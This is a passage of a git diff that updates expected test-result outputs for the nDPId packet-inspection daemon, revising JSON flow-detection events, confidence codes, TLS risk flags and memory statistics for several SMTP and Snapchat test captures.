a/test/results/smtp-starttls.pcap.out +++ b/test/results/smtp-starttls.pcap.out @@ -4,9 +4,10 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"},"smtp": {"user":"","password":""}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Web"}} -00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":6011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1388017125239} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1388017124762,"flow_last_seen":1388017124785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1388017124785,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP.Google","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1388017124762,"flow_last_seen":1388017124864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":385,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1388017124864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"SMTPS.Google","breed":"Acceptable","category":"Email"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1388017124762,"flow_last_seen":1388017125239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6011,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":1388017125239,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"SMTPS.Google","breed":"Acceptable","category":"Email"}} +00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":6011,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1388017125239} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 36/36 ~~ skipped flows.............: 0 @@ -15,10 +16,10 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870487 bytes -~~ total memory freed........: 5870487 bytes -~~ total allocations/frees...: 118150/118150 +~~ total memory allocated....: 6004127 bytes +~~ total memory freed........: 6004127 bytes +~~ total allocations/frees...: 120913/120913 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars -~~ json string max len.......: 691 chars -~~ json string avg len.......: 571 chars +~~ json string max len.......: 825 chars +~~ json string avg len.......: 632 chars diff --git a/test/results/smtp.pcap.out b/test/results/smtp.pcap.out index a462c5ea9..9a1943ea3 100644 --- a/test/results/smtp.pcap.out +++ b/test/results/smtp.pcap.out @@ -4,8 +4,8 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":934028408568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408568,"pkt":"AMBPo1fbABB7OEYzCABFAAAsEDMAAD8GkhjCB\/iZrBByzwhPABnlqEITAAAAAGACAgCMgQAAAgQFtAAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":934028408569,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":934028408569,"pkt":"ABB7OEYzAMBPo1fbCABFAAAsFcQAAEAGi4esEHLPwgf4mQAZCE+jURBm5ahCFGASf+Ba2AAAAgQFtAW0"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":934028408570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":934028408570,"pkt":"AMBPo1fbABB7OEYzCABFAAAoEDRAAD8GUhvCB\/iZrBByzwhPABnlqEIUo1EQZ1AQfXh0\/QAAAAAAAAAA"} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} +00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":934028408568,"flow_last_seen":934028408647,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":934028408647,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":934028408568,"flow_last_seen":934028408801,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":17955,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":934028408801,"l3_proto":"ip4","src_ip":"194.7.248.153","dst_ip":"172.16.114.207","src_port":2127,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SMTP","breed":"Acceptable","category":"Email"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":95,"source":"smtp.pcap","alias":"nDPId-test","packets-captured":95,"packets-processed":95,"total-skipped-flows":0,"total-l4-payload-len":17955,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":934028408801} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 95/95 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874246 bytes -~~ total memory freed........: 5874246 bytes -~~ total allocations/frees...: 118210/118210 +~~ total memory allocated....: 6007880 bytes +~~ total memory freed........: 6007880 bytes +~~ total allocations/frees...: 120972/120972 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 680 chars diff --git a/test/results/smtps.pcapng.out b/test/results/smtps.pcapng.out index 7a62277c1..f285e555e 100644 --- a/test/results/smtps.pcapng.out +++ b/test/results/smtps.pcapng.out @@ -4,8 +4,8 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614938504972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938504972,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0\/aNAAEAGZc0+KyRjFUFfhJMyAdF0clasAAAAAIACFrAhIQAAAgQFhAEBBAIBAwMC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614938505205,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1614938505205,"pkt":"AAAAAAAAAAEA\/khbCABFAAA0AABAAC4GdXEVQV+EPiskYwHRkzJiRoeidHJWrYASchDbkQAAAgQFtAEBBAIBAwMH"} 01146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614938505342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1614938505342,"pkt":"AAAAAAAAAAEA\/khbCABFAAIt\/aVAAEAGY9I+KyRjFUFfhJMyAdF0clatYkaHo1AYBazqdwAAFgMBAgABAAH8AwO7S\/DbiCyixZpW6cPhrJJZKMPmmGE2v4GGVrqm684TKwAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAAEnAAsABAMAAQIACgAcABoAFwAZABwAGwAYABoAFgAOAA0ACwAMAAkACgAjAAAADQAgAB4GAQYCBgMFAQUCBQMEAQQCBAMDAQMCAwMCAQICAgMADwABAQAVAM4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} -00918{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1614938504972,"flow_last_seen":1614938505342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1614938505342,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} +00918{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":696,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938505439} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871615 bytes -~~ total memory freed........: 5871615 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6005249 bytes +~~ total memory freed........: 6005249 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1151 chars diff --git a/test/results/snapchat.pcap.out b/test/results/snapchat.pcap.out index a3a634613..8eb833951 100644 --- a/test/results/snapchat.pcap.out +++ b/test/results/snapchat.pcap.out @@ -4,8 +4,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01108{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01108{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} 